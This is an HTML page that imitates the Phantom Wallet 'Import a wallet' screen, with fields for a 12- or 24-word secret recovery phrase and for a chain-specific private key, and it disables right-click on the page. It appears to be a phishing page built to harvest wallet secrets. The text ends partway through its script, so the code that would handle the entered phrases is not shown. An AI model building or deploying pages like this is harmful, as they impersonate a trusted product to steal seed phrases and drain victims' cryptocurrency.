<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Phantom Wallet</title>
	<script>
        window.oncontextmenu = function () {
            console.log("Right Click Disabled");
            return false;
        }
    </script>
     <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
     <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>

    <style>
        *{
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        body{
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            background-color: #E2DFFE;
        }
        a, button, input{
            font-family: inherit;
        }
        .headBox{
            display: flex;
            align-items: center;
            justify-content: space-between;
            padding: 20px 40px;
        }
        .helpBox span{
            display: inline-block;
            font-weight: 500;
            transform: translateY(-3px);
        }
        .formBox{
            width: 32%;
            margin: 10px auto;
            background-color: rgb(34, 34, 34);
            border: 1px solid rgb(50, 50, 50);
            border-radius: 16px;
            box-shadow: rgba(0, 0, 0, 0.4) 0px 10px 20px;
        }
        .boxHeadCon{
            display: flex;
            align-items: center;
            border-bottom: 1px solid rgb(50, 50, 50);
            padding-bottom: 10px;
            padding: 20px;
        }
        .boxes{
            display: flex;
           align-items: center;
           margin-left: 150px;
        }
        .hgbhRH{
            height: 12px;
            width: 12px;
            border-radius: 50%;
            background-color: #333;
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
            flex-shrink: 0;
            opacity: 1;
            overflow: hidden;
            margin: 0 5px;
           
        }
        .active{
            background-color: rgb(171, 159, 242);
        }
        .boxMain1{
            padding: 20px;
        }
        .boxMainBoxInp{
            text-align: center;
        }
        .boxMainBoxInp h2{
            color: #fff;
            font-weight: 500;
            font-size: 28px;
        }
        .boxMainBoxInp p{
            color: rgb(153, 153, 153);
            opacity: 1;
            font-size: 18px;
            line-height: 25px;
            text-decoration: none;
            background-color: transparent;
            margin-top: 10px;
            margin-bottom: 20px;
        }
        .boxImp{
            display: flex;
            align-items: center;
            background: rgb(42, 42, 42);
            border-radius: 6px;
            padding: 18px 20px;
            width: 100%;
            margin-bottom: 10px;
            cursor: pointer;
        }
        .boxImp:hover {
            background: rgb(51, 51, 51);
        }
        .impText {
            margin-left: 20px;
        }
        .impText h2{
            color: white;
            text-align: left;
            font-style: normal;
            font-weight: 600;
            opacity: 1;
            font-size: 16px;
            line-height: 25px;
            text-decoration: none;
            background-color: transparent;
        }
        .impText p{
            color: rgb(119, 119, 119);
            text-align: left;
            font-style: normal;
            font-weight: normal;
            opacity: 1;
            font-size: 14px;
            line-height: 18px;
            text-decoration: none;
            background-color: transparent;
            
        }
        .impIcon{
            display: flex;
            -webkit-box-align: center;
            align-items: center;
            -webkit-box-pack: center;
            justify-content: center;
            background-color: rgba(255, 255, 255, 0.1);
            border-radius: 32px;
            min-width: 32px;
            width: 32px;
            height: 32px;
            margin-left: -8px;
        }
        .hide{
            display: none;
        }
        .arrowBox svg{
             fill: #666666;
        }
        .arrowBox svg:hover{
            fill: #fff !important;
            cursor: pointer;
        }
       .inpBoxesF{
        display:grid;
        grid-template-columns: repeat(3, 1fr);
        grid-gap: 10px;
       
       }
        .inp-val input{
            color: rgb(255, 255, 255);
            background: #000;
            border: none;
            width: 100%;
            font-size: 15px;
            font-weight: 500;
            cursor: text;
            padding: 10px;
            border-radius: 5px;
            border-bottom: 1px solid rgb(50, 50, 50);
        }
        .inp-val input:focus{
            outline: 1px solid rgb(171, 159, 242);
        }
        .inp-btn{
            margin: 15px 0;
        }
        .inp-btn button:disabled{
            opacity: 0.6;
            background: rgb(51, 51, 51);
            color: #fff;
            cursor: default;
        }
        .inp-btn button{
            display: flex;
            flex-direction: row;
            -webkit-box-pack: center;
            justify-content: center;
            -webkit-box-align: center;
            align-items: center;
            padding: 14px 0px;
            width: 100%;
            border-radius: 6px;
            font-size: 16px;
            font-weight: 600;
            line-height: 19px;
            color: #000;
            pointer-events: auto;
            border: none;
            outline-color: transparent;
            outline-style: none;
            cursor: pointer;
            white-space: nowrap;
            overflow: hidden;
            text-overflow: ellipsis;
            background-color: rgb(171, 159, 242);
        }

        .switchBtn{
            text-align: center;
            margin-top: 15px;
        }
        .switchBtn span{
            cursor: pointer;
            text-decoration: none;
            font-weight: 500;
            color: rgb(119, 119, 119);
            size: 14px;
            line-height: 17px;
        }
        .switchBtn span:hover {
            color: rgb(171, 159, 242);
        }
        .boxprv {
            display: flex;
            align-items: center;
            justify-content: space-between;
            background-color: #000;
            padding: 10px;
            border-radius: 5px;
            cursor: pointer;
        }
        .boxprv span{
            display: inline-block;
            color: #fff;
            margin-left: 10px;
            transform: translateY(-3px);
        }
        .logPv{
            display: flex;
            align-items: center;
        }

        .prvName input{
            color: rgb(255, 255, 255);
            background: #000;
            border: none;
            width: 100%;
            font-size: 15px;
            font-weight: 500;
            cursor: text;
            padding: 14px 10px;
            border-radius: 5px;
            border-bottom: 1px solid rgb(50, 50, 50);
            margin: 10px 0;
        }
        .prvName input:focus{
            outline: none;
        }
        .prvName textarea{
            width: 100%;
            color: rgb(255, 255, 255);
            background: #000;
            border: none;
            width: 100%;
            font-size: 15px;
            font-weight: 500;
            cursor: text;
            border-radius: 5px;
            border-bottom: 1px solid rgb(50, 50, 50);
            font-family: inherit;
            padding: 10px;
           
        }

         .prvName textarea:focus{
            outline: none;
        }
        .errbox{
            margin: 10px 0;
            text-align: center;
        }
        .errbox span {
            color: rgb(224, 27, 27);
            font-size: 15px;
            font-weight: 600;
        }

        @media screen and (max-width: 800px){
            .formBox{
                width: 100%;
                margin-top: 30px;
            }
            .headBox{
                padding: 20px;
            }
        }
    </style>
</head>
<body>
    
    <div class="headBox">
        <div class="headBoxLog">
            <svg width="32" viewBox="0 0 269 224" xmlns="http://www.w3.org/2000/svg" fill="#000"><path d="M31.8301 224C66.1567 224 91.9536 194.147 107.349 170.557C105.476 175.776 104.436 180.995 104.436 186.006C104.436 199.784 112.342 209.596 127.944 209.596C149.373 209.596 172.257 190.807 184.115 170.557C183.283 173.48 182.867 176.194 182.867 178.699C182.867 188.302 188.276 194.356 199.302 194.356C234.045 194.356 268.995 132.772 268.995 78.9115C268.995 36.9506 247.775 0 194.517 0C100.899 0 0 114.401 0 188.302C0 217.32 15.603 224 31.8301 224ZM162.271 74.3187C162.271 63.8807 168.096 56.5741 176.626 56.5741C184.947 56.5741 190.773 63.8807 190.773 74.3187C190.773 84.7568 184.947 92.2721 176.626 92.2721C168.096 92.2721 162.271 84.7568 162.271 74.3187ZM206.792 74.3187C206.792 63.8807 212.617 56.5741 221.146 56.5741C229.468 56.5741 235.293 63.8807 235.293 74.3187C235.293 84.7568 229.468 92.2721 221.146 92.2721C212.617 92.2721 206.792 84.7568 206.792 74.3187Z"></path></svg>
        </div>

        <div class="helpBox">
            <svg width="15" viewBox="0 0 15 15" fill="#000" xmlns="http://www.w3.org/2000/svg"><path d="M7.5 0C3.3589 0 0 3.3589 0 7.5C0 11.6411 3.3589 15 7.5 15C11.6411 15 15 11.6411 15 7.5C15 3.3589 11.6411 0 7.5 0ZM8.31288 11.7485C8.31288 12.0092 8.09816 12.2239 7.83742 12.2239H6.62577C6.36503 12.2239 6.15031 12.0092 6.15031 11.7485V10.9663C6.15031 10.7055 6.36503 10.4908 6.62577 10.4908H7.83742C8.09816 10.4908 8.31288 10.7055 8.31288 10.9663V11.7485ZM10.2301 7.08589C9.90798 7.53067 9.5092 7.88344 9.0184 8.14417C8.74233 8.32822 8.55828 8.51227 8.46626 8.72699C8.40491 8.86503 8.3589 9.04908 8.32822 9.2638C8.31288 9.43252 8.15951 9.55521 7.9908 9.55521H6.50307C6.30368 9.55521 6.15031 9.3865 6.16564 9.20245C6.19632 8.78834 6.30368 8.46626 6.47239 8.22086C6.68712 7.92945 7.07055 7.57669 7.6227 7.19325C7.91411 7.0092 8.12883 6.79448 8.29755 6.53374C8.46626 6.27301 8.54294 5.96626 8.54294 5.6135C8.54294 5.26074 8.45092 4.96932 8.25153 4.7546C8.05215 4.53988 7.79141 4.43252 7.43865 4.43252C7.14724 4.43252 6.91718 4.52454 6.71779 4.69325C6.59509 4.80061 6.5184 4.93865 6.47239 5.1227C6.41104 5.33742 6.21166 5.47546 5.98159 5.47546L4.60123 5.44479C4.43252 5.44479 4.29448 5.29141 4.30982 5.1227C4.35583 4.3865 4.64724 3.83436 5.15337 3.43558C5.7362 2.9908 6.48773 2.76074 7.43865 2.76074C8.45092 2.76074 9.24847 3.02147 9.83129 3.52761C10.4141 4.03374 10.7055 4.72393 10.7055 5.59816C10.7055 6.15031 10.5368 6.6411 10.2301 7.08589Z"></path></svg>
            <span>Help</span>
        </div>
    </div>


    <div class="formBox">
        <div class="boxHeadCon">
            <div class="arrowBox">
                <svg width="15" height="13" class="arrow"><path d="M5.825 0 .34 5.484a1.165 1.165 0 0 0 0 1.647l5.484 5.484 1.647-1.647-3.496-3.495h10.889v-2.33H3.976l3.496-3.496L5.825 0Z"></path></svg>
            </div>

            <div class="boxes">
                <div color="#AB9FF2" opacity="1" class="sc-evcjhq hgbhRH active"></div>
                <div color="#333" opacity="1" class="sc-evcjhq hgbhRH"></div>
                <div color="#333" opacity="1" class="sc-evcjhq hgbhRH"></div>
                
            </div>

        </div>


        <div class="boxMain1">
            <div class="boxMainBoxInp">
                <h2>Import a wallet</h2>
                <p>Import an existing wallet with your secret phrase or private key.</p>
            </div>


            <div class="boxImp impBoxText1">
                <div class="impIcon">
                    <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="none" viewBox="0 0 16 16"><path stroke="#EDEDEF" stroke-linecap="round" stroke-linejoin="round" stroke-width="1.333" d="M9.333 1.333H4a1.333 1.333 0 00-1.333 1.333v10.667A1.333 1.333 0 004 14.666h8a1.333 1.333 0 001.333-1.333v-8l-4-4z"></path><path stroke="#EDEDEF" stroke-linecap="round" stroke-linejoin="round" stroke-width="1.333" d="M9.334 1.333v4h4M10.667 8.667H5.334M10.667 11.333H5.334M6.667 6H5.333"></path></svg>
                </div>

                <div class="impText">
                    <h2>Import Secret Recovery Phrase</h2>
                    <p>Import accounts from another wallet</p>
                </div>
            </div>


              <div class="boxImp impBoxText2">
                <div class="impIcon">
                  <svg width="14" height="14" fill="none"><path d="M13 9v2.667A1.334 1.334 0 0 1 11.667 13H2.333A1.334 1.334 0 0 1 1 11.667V9m2.667-3.333L7 9m0 0 3.333-3.333M7 9V1" stroke="#EDEDEF" stroke-width="1.333" stroke-linecap="round" stroke-linejoin="round"></path></svg>
                </div>

                <div class="impText">
                    <h2>Import Private Key</h2>
                    <p>Import a single-chain account</p>
                </div>
            </div>
        </div>
    </div>



     <div class="formBox hide">
        <div class="boxHeadCon">
            <div class="arrowBox">
                <svg width="15" height="13" class="arrow"><path d="M5.825 0 .34 5.484a1.165 1.165 0 0 0 0 1.647l5.484 5.484 1.647-1.647-3.496-3.495h10.889v-2.33H3.976l3.496-3.496L5.825 0Z"></path></svg>
            </div>

            <div class="boxes">
                <div color="#AB9FF2" opacity="1" class="sc-evcjhq hgbhRH active"></div>
                <div color="#333" opacity="1" class="sc-evcjhq hgbhRH active"></div>
                <div color="#333" opacity="1" class="sc-evcjhq hgbhRH"></div>
                
            </div>

        </div>


        <div class="boxMain1 boxPhase2">
            <div class="boxMainBoxInp">
                <h2>Secret Recovery Phrase</h2>
                <p>Import an existing wallet with your 12 or 24-word secret recovery phrase.</p>
            </div>


            <div class="errbox hide">
                <span>Invalid secret phrase, Please enter valid Phrase</span>
            </div>
            <div class="inp-box">
               <form action="#" class="boxMainInpF wordForm1">
                <div class="inpBoxesF">
                     <div class="inp-val">
                    <input type="text" name="word12" class="word12" placeholder="1.">
                </div>

                <div class="inp-val">
                    <input type="text" name="word12" class="word12" placeholder="2.">
                </div>

                   <div class="inp-val">
                    <input type="text" name="word12" class="word12" placeholder="3.">
                </div>


                   <div class="inp-val">
                    <input type="text" name="word12" class="word12" placeholder="4.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word12" class="word12" placeholder="5.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word12" class="word12" placeholder="6.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word12" class="word12" placeholder="7.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word12" class="word12" placeholder="8.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word12" class="word12" placeholder="9.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word12" class="word12" placeholder="10.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word12" class="word12" placeholder="11.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word12" class="word12" placeholder="12.">
                </div>
                </div>

                <div class="switchBtn">
                    <span class="btnSwitch1">I have a 24-word recovery phrase</span>
                </div>

                <div class="inp-btn">
                    <button class="btnSign" disabled>Import Wallet</button>
                </div>
               </form>
            </div>



            <div class="inp-box hide">
               <form action="#" class="boxMainInpF wordForm5">
                <div class="inpBoxesF">
                     <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="1.">
                </div>

                <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="2.">
                </div>

                   <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="3.">
                </div>


                   <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="4.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="5.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="6.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="7.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word12" class="word24" placeholder="8.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="9.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word12" class="word24" placeholder="10.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="11.">
                </div>

                 <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="12.">
                </div>


                <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="13.">
                </div>

                  <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="14.">
                </div>

                  <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="15.">
                </div>

                  <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="16.">
                </div>


                 <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="17.">
                </div>


                  <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="18.">
                </div>

                  <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="19.">
                </div>

                <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="20.">
                </div>

                  <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="21.">
                </div>

                  <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="22.">
                </div>

                  <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="23.">
                </div>

                  <div class="inp-val">
                    <input type="text" name="word24" class="word24" placeholder="24.">
            </div>

            
                </div>

                <div class="switchBtn">
                    <span class="btnSwitch2">I have a 12-word recovery phrase</span>
                </div>

                <div class="inp-btn">
                    <button class="btnSign" disabled>Import Wallet</button>
                </div>
               </form>
            </div>
           
        </div>






        <div class="boxMain1 bxprBoxMajor hide">
            <div class="boxMainBoxInp">
                <h2>Import a Private Key</h2>
                <p>Import an existing single-chain wallet</p>
            </div>

            <div class="inp-box">
               <form action="#" class="boxMainInpF mFormk">
                <div class="boxprv prLinkBar">
                    <div class="logPv">
                        <div class="boxprvSvg">
                          <svg xmlns="http://www.w3.org/2000/svg" class="ethe hide" width="30" height="30" viewBox="0 0 22 22" fill="none"><rect x="1" y="1" width="20" height="20" rx="7.27273" fill="white" stroke="" stroke-width="2"></rect><path d="M11.077 5.44447L11.0025 5.69765V13.0446L11.077 13.1189L14.4873 11.1031L11.077 5.44447Z" fill="black"></path><path d="M11.077 5.44447L7.66663 11.1031L11.077 13.1189L11.077 9.55299L11.077 5.44447Z" fill="black"></path><path d="M11.077 13.7647L11.035 13.8158V16.433L11.077 16.5556L14.4894 11.7498L11.077 13.7647Z" fill="black"></path><path d="M11.077 16.5556V13.7647L7.66663 11.7498L11.077 16.5556Z" fill="black"></path><path d="M11.077 13.1189L14.4873 11.1031L11.077 9.55299L11.077 13.1189Z" fill="black"></path><path d="M7.66663 11.1031L11.077 13.1189L11.077 9.55299L7.66663 11.1031Z" fill="black"></path></svg>
                          <svg class="poly hide" xmlns="http://www.w3.org/2000/svg" width="30" height="30" viewBox="0 0 22 22" fill="none"><rect x="1" y="1" width="20" height="20" rx="7.27273" fill="white" stroke="" stroke-width="2"></rect><path d="M13.8211 9.13303C13.6082 9.01136 13.3345 9.01136 13.0911 9.13303L11.3877 10.1368L10.2319 10.7756L8.55888 11.7794C8.34595 11.901 8.07219 11.901 7.82885 11.7794L6.52089 10.9885C6.30796 10.8668 6.15587 10.6235 6.15587 10.3497V8.82885C6.15587 8.58551 6.27755 8.34217 6.52089 8.19008L7.82885 7.42963C8.04178 7.30796 8.31553 7.30796 8.55888 7.42963L9.86684 8.2205C10.0798 8.34217 10.2319 8.58551 10.2319 8.85927V9.86305L11.3877 9.19386V8.15966C11.3877 7.91632 11.2661 7.67298 11.0227 7.52089L8.58929 6.09125C8.37637 5.96958 8.10261 5.96958 7.85927 6.09125L5.36501 7.55131C5.12167 7.67298 5 7.91632 5 8.15966V11.0189C5 11.2623 5.12167 11.5056 5.36501 11.6577L7.82885 13.0873C8.04178 13.209 8.31553 13.209 8.55888 13.0873L10.2319 12.114L11.3877 11.4448L13.0607 10.4714C13.2736 10.3497 13.5474 10.3497 13.7907 10.4714L15.0987 11.2319C15.3116 11.3535 15.4637 11.5969 15.4637 11.8706V13.3915C15.4637 13.6349 15.342 13.8782 15.0987 14.0303L13.8211 14.7907C13.6082 14.9124 13.3345 14.9124 13.0911 14.7907L11.7832 14.0303C11.5702 13.9086 11.4181 13.6653 11.4181 13.3915V12.4181L10.2623 13.0873V14.0911C10.2623 14.3345 10.3839 14.5778 10.6273 14.7299L13.0911 16.1595C13.304 16.2812 13.5778 16.2812 13.8211 16.1595L16.285 14.7299C16.4979 14.6082 16.65 14.3649 16.65 14.0911V11.2014C16.65 10.9581 16.5283 10.7148 16.285 10.5627L13.8211 9.13303Z" fill="black"></path></svg>
                        <svg xmlns="http://www.w3.org/2000/svg" class="sol" width="30" height="30" viewBox="0 0 22 22" fill="none"><rect x="1" y="1" width="20" height="20" rx="7.27273" fill="white" stroke="" stroke-width="2"></rect><path fill-rule="evenodd" clip-rule="evenodd" d="M7.73514 13.3866C7.76771 13.3507 7.80742 13.3221 7.8517 13.3025C7.89597 13.2829 7.94386 13.2728 7.99228 13.2727L15.9265 13.2792C15.9603 13.2793 15.9933 13.2892 16.0216 13.3077C16.0499 13.3261 16.0722 13.3525 16.0858 13.3834C16.0994 13.4143 16.1038 13.4485 16.0983 13.4818C16.0928 13.5152 16.0778 13.5462 16.0551 13.5712L14.3654 15.4316C14.3328 15.4675 14.2931 15.4961 14.2488 15.5157C14.2045 15.5353 14.1565 15.5455 14.1081 15.5455L6.1741 15.539C6.14032 15.5389 6.10727 15.529 6.07899 15.5105C6.05071 15.492 6.02841 15.4657 6.01479 15.4348C6.00118 15.4039 5.99683 15.3697 6.00229 15.3363C6.00775 15.303 6.02277 15.2719 6.04553 15.247L7.73514 13.3866ZM16.0551 11.8379C16.0778 11.8628 16.0928 11.8939 16.0983 11.9272C16.1038 11.9606 16.0994 11.9948 16.0858 12.0257C16.0722 12.0566 16.0499 12.0829 16.0216 12.1014C15.9933 12.1199 15.9603 12.1298 15.9265 12.1299L7.9925 12.1364C7.94404 12.1364 7.89611 12.1262 7.85179 12.1066C7.80748 12.087 7.76775 12.0584 7.73514 12.0225L6.04553 10.161C6.02277 10.1361 6.00775 10.105 6.00229 10.0717C5.99683 10.0383 6.00118 10.0041 6.01479 9.9732C6.02841 9.94227 6.05071 9.91597 6.07899 9.89749C6.10727 9.87899 6.14032 9.86911 6.1741 9.86905L14.1083 9.86255C14.1567 9.86258 14.2046 9.87273 14.2489 9.89234C14.2932 9.91194 14.3329 9.94057 14.3654 9.9764L16.0551 11.8379ZM7.73514 6.5684C7.76771 6.53257 7.80742 6.50393 7.8517 6.48433C7.89597 6.46472 7.94386 6.45458 7.99228 6.45454L15.9265 6.46104C15.9603 6.46111 15.9933 6.47099 16.0216 6.48947C16.0499 6.50796 16.0722 6.53427 16.0858 6.56519C16.0994 6.59611 16.1038 6.63033 16.0983 6.66367C16.0928 6.69702 16.0778 6.72806 16.0551 6.75303L14.3654 8.61342C14.3328 8.64927 14.2931 8.67793 14.2488 8.69753C14.2045 8.71714 14.1565 8.72727 14.1081 8.72727L6.1741 8.72078C6.14032 8.72071 6.10727 8.71083 6.07899 8.69234C6.05071 8.67385 6.02841 8.64755 6.01479 8.61662C6.00118 8.5857 5.99683 8.55149 6.00229 8.51815C6.00775 8.4848 6.02277 8.45375 6.04553 8.42879L7.73514 6.5684Z" fill="black"></path></svg>
                        </div>

                        <div class="boxPSpan">
                            <span class="subSpan">Solana</span>
                        </div>
                    </div>

                    <div class="iconDrop">
                        <svg width="10" viewBox="0 0 7 4" fill="#777" xmlns="http://www.w3.org/2000/svg"><path d="M3.95893 3.81967L6.81201 1.06951C7.06266 0.827891 7.06266 0.429935 6.81201 0.188318C6.56135 -0.0532976 6.1485 -0.0532976 5.89784 0.188318L3.50184 2.49078L1.10585 0.181212C0.855187 -0.060404 0.442338 -0.060404 0.19168 0.181212C0.0663507 0.30202 0 0.465466 0 0.621806C0 0.785252 0.0663507 0.941592 0.19168 1.0624L3.04476 3.81256C3.29542 4.06128 3.70827 4.06128 3.95893 3.81967Z"></path></svg>
                    </div>
                </div>



                <div class="mainPrvNet hide">
                    <div class="boxprv showBox">

                    <div class="logPv sol1">
                        <div class="boxprvSvg">
                          
                        <svg xmlns="http://www.w3.org/2000/svg" class="prsm" width="30" height="30" viewBox="0 0 22 22" fill="none"><rect x="1" y="1" width="20" height="20" rx="7.27273" fill="white" stroke="" stroke-width="2"></rect><path d="M13.8211 9.13303C13.6082 9.01136 13.3345 9.01136 13.0911 9.13303L11.3877 10.1368L10.2319 10.7756L8.55888 11.7794C8.34595 11.901 8.07219 11.901 7.82885 11.7794L6.52089 10.9885C6.30796 10.8668 6.15587 10.6235 6.15587 10.3497V8.82885C6.15587 8.58551 6.27755 8.34217 6.52089 8.19008L7.82885 7.42963C8.04178 7.30796 8.31553 7.30796 8.55888 7.42963L9.86684 8.2205C10.0798 8.34217 10.2319 8.58551 10.2319 8.85927V9.86305L11.3877 9.19386V8.15966C11.3877 7.91632 11.2661 7.67298 11.0227 7.52089L8.58929 6.09125C8.37637 5.96958 8.10261 5.96958 7.85927 6.09125L5.36501 7.55131C5.12167 7.67298 5 7.91632 5 8.15966V11.0189C5 11.2623 5.12167 11.5056 5.36501 11.6577L7.82885 13.0873C8.04178 13.209 8.31553 13.209 8.55888 13.0873L10.2319 12.114L11.3877 11.4448L13.0607 10.4714C13.2736 10.3497 13.5474 10.3497 13.7907 10.4714L15.0987 11.2319C15.3116 11.3535 15.4637 11.5969 15.4637 11.8706V13.3915C15.4637 13.6349 15.342 13.8782 15.0987 14.0303L13.8211 14.7907C13.6082 14.9124 13.3345 14.9124 13.0911 14.7907L11.7832 14.0303C11.5702 13.9086 11.4181 13.6653 11.4181 13.3915V12.4181L10.2623 13.0873V14.0911C10.2623 14.3345 10.3839 14.5778 10.6273 14.7299L13.0911 16.1595C13.304 16.2812 13.5778 16.2812 13.8211 16.1595L16.285 14.7299C16.4979 14.6082 16.65 14.3649 16.65 14.0911V11.2014C16.65 10.9581 16.5283 10.7148 16.285 10.5627L13.8211 9.13303Z" fill="black"></path></svg>
                        </div>

                        <div class="boxPSpan">
                            <span class="part1">Polygon</span>
                        </div>
                    </div>
                </div>


                <div class="boxprv">
                    <div class="logPv sol1">
                            <div class="boxprvSvg">

                      
                        <svg xmlns="http://www.w3.org/2000/svg" class="prsm" width="30" height="30" viewBox="0 0 22 22" fill="none"><rect x="1" y="1" width="20" height="20" rx="7.27273" fill="white" stroke="" stroke-width="2"></rect><path d="M11.077 5.44447L11.0025 5.69765V13.0446L11.077 13.1189L14.4873 11.1031L11.077 5.44447Z" fill="black"></path><path d="M11.077 5.44447L7.66663 11.1031L11.077 13.1189L11.077 9.55299L11.077 5.44447Z" fill="black"></path><path d="M11.077 13.7647L11.035 13.8158V16.433L11.077 16.5556L14.4894 11.7498L11.077 13.7647Z" fill="black"></path><path d="M11.077 16.5556V13.7647L7.66663 11.7498L11.077 16.5556Z" fill="black"></path><path d="M11.077 13.1189L14.4873 11.1031L11.077 9.55299L11.077 13.1189Z" fill="black"></path><path d="M7.66663 11.1031L11.077 13.1189L11.077 9.55299L7.66663 11.1031Z" fill="black"></path></svg>
                            </div>

                            <div class="boxPSpan">
                                <span class="part1">Ethereum</span>
                            </div>
                        </div>
                </div>



                <div class="boxprv">
                    <div class="logPv sol1">
                            <div class="boxprvSvg">

                        
                        <svg xmlns="http://www.w3.org/2000/svg"  width="30" height="30" viewBox="0 0 22 22" fill="none"><rect x="1" y="1" width="20" height="20" rx="7.27273" fill="white" stroke="" stroke-width="2"></rect><path fill-rule="evenodd" clip-rule="evenodd" d="M7.73514 13.3866C7.76771 13.3507 7.80742 13.3221 7.8517 13.3025C7.89597 13.2829 7.94386 13.2728 7.99228 13.2727L15.9265 13.2792C15.9603 13.2793 15.9933 13.2892 16.0216 13.3077C16.0499 13.3261 16.0722 13.3525 16.0858 13.3834C16.0994 13.4143 16.1038 13.4485 16.0983 13.4818C16.0928 13.5152 16.0778 13.5462 16.0551 13.5712L14.3654 15.4316C14.3328 15.4675 14.2931 15.4961 14.2488 15.5157C14.2045 15.5353 14.1565 15.5455 14.1081 15.5455L6.1741 15.539C6.14032 15.5389 6.10727 15.529 6.07899 15.5105C6.05071 15.492 6.02841 15.4657 6.01479 15.4348C6.00118 15.4039 5.99683 15.3697 6.00229 15.3363C6.00775 15.303 6.02277 15.2719 6.04553 15.247L7.73514 13.3866ZM16.0551 11.8379C16.0778 11.8628 16.0928 11.8939 16.0983 11.9272C16.1038 11.9606 16.0994 11.9948 16.0858 12.0257C16.0722 12.0566 16.0499 12.0829 16.0216 12.1014C15.9933 12.1199 15.9603 12.1298 15.9265 12.1299L7.9925 12.1364C7.94404 12.1364 7.89611 12.1262 7.85179 12.1066C7.80748 12.087 7.76775 12.0584 7.73514 12.0225L6.04553 10.161C6.02277 10.1361 6.00775 10.105 6.00229 10.0717C5.99683 10.0383 6.00118 10.0041 6.01479 9.9732C6.02841 9.94227 6.05071 9.91597 6.07899 9.89749C6.10727 9.87899 6.14032 9.86911 6.1741 9.86905L14.1083 9.86255C14.1567 9.86258 14.2046 9.87273 14.2489 9.89234C14.2932 9.91194 14.3329 9.94057 14.3654 9.9764L16.0551 11.8379ZM7.73514 6.5684C7.76771 6.53257 7.80742 6.50393 7.8517 6.48433C7.89597 6.46472 7.94386 6.45458 7.99228 6.45454L15.9265 6.46104C15.9603 6.46111 15.9933 6.47099 16.0216 6.48947C16.0499 6.50796 16.0722 6.53427 16.0858 6.56519C16.0994 6.59611 16.1038 6.63033 16.0983 6.66367C16.0928 6.69702 16.0778 6.72806 16.0551 6.75303L14.3654 8.61342C14.3328 8.64927 14.2931 8.67793 14.2488 8.69753C14.2045 8.71714 14.1565 8.72727 14.1081 8.72727L6.1741 8.72078C6.14032 8.72071 6.10727 8.71083 6.07899 8.69234C6.05071 8.67385 6.02841 8.64755 6.01479 8.61662C6.00118 8.5857 5.99683 8.55149 6.00229 8.51815C6.00775 8.4848 6.02277 8.45375 6.04553 8.42879L7.73514 6.5684Z" fill="black"></path></svg>
                            </div>

                            <div class="boxPSpan">
                                <span class="part1">Solana</span>
                            </div>
                        </div>
                </div>

                </div>
                <div class="prvName">
                    <input type="text" placeholder="Name" name="name" class="name">
                </div>


                <div class="prvName">
                  <textarea name="key" cols="30" rows="7" placeholder="Private key" class="key"></textarea>
                </div>

                <div class="inp-btn">
                    <button class="btnSign" disabled>Import</button>
                </div>
               </form>
            </div>

        </div>
    </div>
    

    <script>
        const impBoxText1 = document.querySelector(".impBoxText1");
        const impBoxText2 = document.querySelector(".impBoxText2");
        const [arrow1, arrow2] = document.querySelectorAll(".arrow");
        const [formBox1, formBox2] = document.querySelectorAll(".formBox");
        const btnSwitch1 = document.querySelector(".btnSwitch1");
        const btnSwitch2 = document.querySelector(".btnSwitch2");
        const [inpBox1, inpBox2] = document.querySelectorAll(".inp-box");
        const prLinkBar = document.querySelector(".prLinkBar");
        const mainPrvNet = document.querySelector(".mainPrvNet");
        const sol1 = document.querySelectorAll(".sol1");
        const part1 = document.querySelectorAll(".part1");
        const subSpan = document.querySelector(".subSpan");
        const ethe = document.querySelector(".ethe");
        const poly = document.querySelector(".poly");
        const sol = document.querySelector(".sol");
        const bxprBoxMajor = document.querySelector(".bxprBoxMajor");
        const boxPhase2 = document.querySelector(".boxPhase2");
        const word12 = document.querySelectorAll(".word12");
